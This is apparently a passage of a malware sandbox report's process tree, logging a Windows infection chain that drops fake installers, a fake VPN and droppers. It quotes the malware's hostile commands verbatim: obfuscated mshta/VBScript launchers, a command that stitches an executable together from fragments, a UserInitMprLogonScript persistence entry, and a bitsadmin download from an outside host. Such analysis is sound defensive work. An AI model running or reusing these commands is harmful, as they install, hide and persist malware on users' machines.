C:\Users\Admin\Pictures\Adobe Films\6PzDKqTumYc6wQmCZmE1EFMz.exe"C:\Users\Admin\Pictures\Adobe Films\6PzDKqTumYc6wQmCZmE1EFMz.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\sgW4jGtWxhxeWNFGti7lxHAb.exe"C:\Users\Admin\Pictures\Adobe Films\sgW4jGtWxhxeWNFGti7lxHAb.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\xZo5SkZvBjjKerb8WgYJbhvy.exe"C:\Users\Admin\Pictures\Adobe Films\xZo5SkZvBjjKerb8WgYJbhvy.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\Ed_zx0pAemCqxcN5I9SQkaTQ.exe"C:\Users\Admin\Pictures\Adobe Films\Ed_zx0pAemCqxcN5I9SQkaTQ.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\0RUQ6M4hEj5uKszGSI2ZUJVQ.exe"C:\Users\Admin\Pictures\Adobe Films\0RUQ6M4hEj5uKszGSI2ZUJVQ.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\424779.exe"C:\Users\Admin\AppData\Roaming\424779.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\2974229.exe"C:\Users\Admin\AppData\Roaming\2974229.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\6199182.exe"C:\Users\Admin\AppData\Roaming\6199182.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\6199182.exe"C:\Users\Admin\AppData\Roaming\6199182.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\6199182.exe"C:\Users\Admin\AppData\Roaming\6199182.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\6670411.exe"C:\Users\Admin\AppData\Roaming\6670411.exe"7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\5669991.exe"C:\Users\Admin\AppData\Roaming\5669991.exe"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\dBfLigPnGbkVroMLScuPczOh.exe"C:\Users\Admin\Pictures\Adobe Films\dBfLigPnGbkVroMLScuPczOh.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\dBfLigPnGbkVroMLScuPczOh.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\dBfLigPnGbkVroMLScuPczOh.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\dBfLigPnGbkVroMLScuPczOh.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\dBfLigPnGbkVroMLScuPczOh.exe" ) do taskkill -im "%~NxK" -F8⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl+ _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"12⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY12⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "dBfLigPnGbkVroMLScuPczOh.exe" -F9⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\GKWt8jAAi7IwCqNCN3FGm_q4.exe"C:\Users\Admin\Pictures\Adobe Films\GKWt8jAAi7IwCqNCN3FGm_q4.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-P6LVD.tmp\GKWt8jAAi7IwCqNCN3FGm_q4.tmp"C:\Users\Admin\AppData\Local\Temp\is-P6LVD.tmp\GKWt8jAAi7IwCqNCN3FGm_q4.tmp" /SL5="$A020E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\GKWt8jAAi7IwCqNCN3FGm_q4.exe"7⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-ERKL2.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-ERKL2.tmp\DYbALA.exe" /S /UID=27108⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Microsoft Office 15\JUKBWVWKYK\foldershare.exe"C:\Program Files\Microsoft Office 15\JUKBWVWKYK\foldershare.exe" /VERYSILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\3c-48672-d37-23cb2-06ffaa0ba00ec\Qidymacano.exe"C:\Users\Admin\AppData\Local\Temp\3c-48672-d37-23cb2-06ffaa0ba00ec\Qidymacano.exe"9⤵
- Checks computer location settings
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 248010⤵
-
C:\Users\Admin\AppData\Local\Temp\dd-cffa8-5f2-654bb-972bad5daeef7\Decylyvala.exe"C:\Users\Admin\AppData\Local\Temp\dd-cffa8-5f2-654bb-972bad5daeef7\Decylyvala.exe"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lla1u2ef.ypc\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\lla1u2ef.ypc\setting.exeC:\Users\Admin\AppData\Local\Temp\lla1u2ef.ypc\setting.exe SID=778 CID=778 SILENT=1 /quiet11⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\lla1u2ef.ypc\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\lla1u2ef.ypc\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634846932 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l4pqr4ya.23e\GcleanerEU.exe /eufive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\l4pqr4ya.23e\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\l4pqr4ya.23e\GcleanerEU.exe /eufive11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 64812⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 66412⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 66812⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 65612⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 90412⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b1vudadb.135\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\b1vudadb.135\installer.exeC:\Users\Admin\AppData\Local\Temp\b1vudadb.135\installer.exe /qn CAMPAIGN="654"11⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\b1vudadb.135\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\b1vudadb.135\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634846932 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lwr1seqa.zxq\any.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\lwr1seqa.zxq\any.exeC:\Users\Admin\AppData\Local\Temp\lwr1seqa.zxq\any.exe11⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ds30d3g1.w5s\customer51.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\ds30d3g1.w5s\customer51.exeC:\Users\Admin\AppData\Local\Temp\ds30d3g1.w5s\customer51.exe11⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vt3v30hp.wkn\gcleaner.exe /mixfive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\vt3v30hp.wkn\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\vt3v30hp.wkn\gcleaner.exe /mixfive11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8448 -s 64812⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8448 -s 66412⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8448 -s 62012⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8448 -s 64412⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8448 -s 90012⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8448 -s 97212⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8448 -s 108412⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0mums1cj.my2\FastPC.exe /verysilent & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\0mums1cj.my2\FastPC.exeC:\Users\Admin\AppData\Local\Temp\0mums1cj.my2\FastPC.exe /verysilent11⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im FastPC.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\0mums1cj.my2\FastPC.exe" & del C:\ProgramData\*.dll & exit12⤵
- Blocklisted process makes network request
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im FastPC.exe /f13⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 613⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\euwd4bfg.wch\FastPC.exe /verysilent & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\euwd4bfg.wch\FastPC.exeC:\Users\Admin\AppData\Local\Temp\euwd4bfg.wch\FastPC.exe /verysilent11⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-JJBOG.tmp\FastPC.tmp"C:\Users\Admin\AppData\Local\Temp\is-JJBOG.tmp\FastPC.tmp" /SL5="$10788,138429,56832,C:\Users\Admin\AppData\Local\Temp\euwd4bfg.wch\FastPC.exe" /verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-NOFPU.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-NOFPU.tmp\Setup.exe" /Verysilent13⤵
-
C:\Program Files (x86)\FastPc\FastPc\Fast_.exe"C:\Program Files (x86)\FastPc\FastPc\Fast_.exe"14⤵
-
C:\Program Files (x86)\FastPc\FastPc\13.exe"C:\Program Files (x86)\FastPc\FastPc\13.exe"14⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"15⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"16⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"16⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"16⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"16⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"16⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: SetClipboardViewer
-
C:\Program Files (x86)\FastPc\FastPc\Fast.exe"C:\Program Files (x86)\FastPc\FastPc\Fast.exe"14⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Fast.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\FastPc\FastPc\Fast.exe" & del C:\ProgramData\*.dll & exit15⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Fast.exe /f16⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 616⤵
- Delays execution with timeout.exe
-
C:\Program Files (x86)\FastPc\FastPc\Faster.exe"C:\Program Files (x86)\FastPc\FastPc\Faster.exe"14⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"15⤵
-
C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe"C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 72115⤵
-
C:\Users\Admin\AppData\Local\Temp\is-HDI7T.tmp\IBInstaller_74449.tmp"C:\Users\Admin\AppData\Local\Temp\is-HDI7T.tmp\IBInstaller_74449.tmp" /SL5="$20444,17037196,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 72116⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-0B3JR.tmp\{app}\microsoft.cab -F:* %ProgramData%17⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-0B3JR.tmp\{app}\microsoft.cab -F:* C:\ProgramData18⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f17⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f18⤵
-
C:\Users\Admin\AppData\Local\Temp\is-0B3JR.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-0B3JR.tmp\{app}\vdi_compiler"17⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-0B3JR.tmp\{app}\vdi_compiler.exe"18⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 419⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://coeplorfd234.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=72117⤵
- Checks computer location settings
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"17⤵
-
C:\Users\Admin\AppData\Local\Temp\vpn.exe"C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=72015⤵
-
C:\Users\Admin\AppData\Local\Temp\is-C17D6.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-C17D6.tmp\vpn.tmp" /SL5="$40444,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=72016⤵
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies system certificate store
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "17⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090118⤵
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "17⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090118⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall17⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install17⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\Settings Installation.exe"C:\Users\Admin\AppData\Local\Temp\Settings Installation.exe" SID=775 SID CID=775 SILENT=1 /quiet15⤵
-
C:\Users\Admin\AppData\Local\Temp\note866.exe"C:\Users\Admin\AppData\Local\Temp\note866.exe"15⤵
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Program Files (x86)\FastPc\FastPc\Faster.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Program Files (x86)\FastPc\FastPc\Faster.exe"15⤵
-
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 10016⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 90016⤵
- Runs ping.exe
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mly1oa4h.0yp\autosubplayer.exe /S & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\mly1oa4h.0yp\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\mly1oa4h.0yp\autosubplayer.exe /S11⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"12⤵
- Blocklisted process makes network request
- Checks for any installed AV software in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z12⤵
- Download via BitsAdmin
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
- Loads dropped DLL
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pcKaq2Eq28KXYPtY -y x C:\zip.7z -o"C:\Program Files\temp_files\"12⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pIpp1OPsBdTop3OU -y x C:\zip.7z -o"C:\Program Files\temp_files\"12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"12⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9348 -s 121612⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oax0ui1q.saj\installer.exe /qn CAMPAIGN=654 & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\oax0ui1q.saj\installer.exeC:\Users\Admin\AppData\Local\Temp\oax0ui1q.saj\installer.exe /qn CAMPAIGN=65411⤵
-
C:\Users\Admin\Pictures\Adobe Films\VQkGBnO_XmTtKCVqhBHSUro2.exe"C:\Users\Admin\Pictures\Adobe Films\VQkGBnO_XmTtKCVqhBHSUro2.exe"6⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"8⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x278,0x238,0x234,0x244,0x230,0x7ffb789adec0,0x7ffb789aded0,0x7ffb789adee09⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x134,0x138,0x13c,0x110,0x140,0x7ff7d98a9e70,0x7ff7d98a9e80,0x7ff7d98a9e9010⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1648,2415241214401970410,9284425442218525090,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9880_912709918" --mojo-platform-channel-handle=1664 /prefetch:89⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1481f5a7e3eccdd.exeSat1481f5a7e3eccdd.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
